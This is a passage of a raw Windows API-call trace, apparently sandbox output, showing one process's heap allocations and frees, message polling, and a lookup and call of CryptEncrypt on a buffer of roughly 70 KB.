hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.834] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.834] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0239.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0239.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.834] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.834] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0239.834] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0239.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0239.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.835] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0239.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.835] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0239.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0239.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51580, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0239.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0239.838] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f5f8 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0239.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0239.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0239.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0239.841] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11111, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11118) returned 1 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0239.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0239.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0239.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0239.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0239.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0239.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0239.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0239.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0239.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0239.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0239.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0239.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0239.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0239.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0239.846] CharLowerBuffW (in: lpsz="byte[69912]", cchLength=0xb | out: lpsz="byte[69912]") returned 0xb [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0239.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11118) returned 0x2e80330 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0239.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0239.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0239.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: 